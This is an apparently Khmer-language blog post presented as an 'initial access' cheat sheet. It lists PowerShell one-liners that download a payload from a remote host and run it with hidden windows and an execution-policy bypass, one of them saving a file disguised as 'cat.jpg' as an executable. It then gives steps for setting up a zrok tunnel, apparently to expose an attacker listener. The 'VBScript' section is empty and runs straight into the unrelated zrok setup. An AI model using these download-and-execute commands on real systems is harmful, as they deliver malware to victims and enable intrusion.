This page looks best with JavaScript enabled

Initial Access: Powershell Cheat Sheet

 ·  β˜• 1 min read  ·  🐱 thik

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αž‡αžΆαžœαž·αž’αžΈαž€αŸ’αž“αž»αž„αž€αžΆαžšαž‘αžΆαž‰αž™αž€αž“αžΌαžœαžšαžΆαž›αŸ‹ Payloads αž…αŸαž‰αž–αžΈαž’αŸŠαžΈαž“αž’αžΊαžŽαž·αž αŸ”

Based On

  • PowerShell
  • VBScript
  • Batch Script

Method 1 - PowerShell Downloader

1
2
3
4
5
# Download and Execute Payload (PS1)
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.x.x:8081/test.ps1')"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.x.x:8081/test.ps1'))"

# ./test.ps1 => Start-Process 'C:\windows\system32\calc.exe'
1
2
3
4
# Download/Save/Execute
PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.x.x:8081/cat.jpg','%temp%\putty.exe'); Start-Process '%temp%\putty.exe'

PowerShell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source http://192.168.x.x:8081/cat.jpg -Destination $env:temp\cat.exe; Start-Process $env:temp\cat.exe

Method 2 - VBScript Downloader

' Download and Execute Payload

αž…αžΌαž›αž‘αŸ…αžαŸ†αžŽαž—αŸ’αž‡αžΆαž”αŸ‹αž“αŸαŸ‡ https://docs.zrok.io/docs/getting-started/ αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αžŸαžΌαž˜αž‘αžΆαž‰αž™αž€αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž²αŸ’αž™αžαŸ’αžšαžΌαžœαž‘αŸ…αžαžΆαž˜αž”αŸ’αžšαž—αŸαž‘αž“αŸƒαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαžšαž”αžŸαŸ‹αž’αŸ’αž“αž€ αž€αŸ’αž“αž»αž„αž“αŸƒαž“αŸαŸ‡αžαŸ’αž‰αž»αŸ†αž“αžΉαž„αž™αž€αž”αŸ’αžšαž—αŸαž‘ Linux αž’αŸ’αžœαžΎαž‡αžΆαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸ αŸ”

1
wget https://github.com/openziti/zrok/releases/download/v0.4.31/zrok_0.4.31_linux_arm64.tar.gz -O zrok.tar.gz

αž–αž“αŸ’αž›αžΆαž―αž€αžŸαžΆαžšαž…αŸαž‰αž“αŸ„αŸ‡αž’αŸ’αž“αž€αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“β€‹αž―αž€αžŸαžΆαžšαž‚αŸ„αž›αž‚αžΊ Zrok αŸ”

αž…αžΌαž›αž‘αŸ… Terminal αž“αž·αž„αžœαžΆαž™αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
./zrok invite

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αžŸαžΌαž˜αž”αž‰αŸ’αž‡αžΌαž› Email αžšαž”αžŸαŸ‹αž’αŸ’αž“αž€αžŠαžΎαž˜αŸ’αž”αžΈαž…αž»αŸ‡αžˆαŸ’αž˜αŸ„αŸ‡αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αžŸαŸαžœαžΆαž€αž˜αŸ’αž˜ αŸ”

Zrok Invite

αž…αŸ†αž–αŸ„αŸ‡ Listener αž“αž·αž„ Beacons αžŸαžΌαž˜αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž’αžαŸ’αžαž”αž‘αž˜αž»αž“αžšαž”αžŸαŸ‹αžαŸ’αž‰αž»αŸ† αžŠαŸ‚αž›αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Telebit αž€αŸ’αž“αž»αž„αž€αžΆαžšαž”αž„αŸ’αž€αžΎαž αŸ•

Share on

Thik
WRITTEN BY
thik
Security Researcher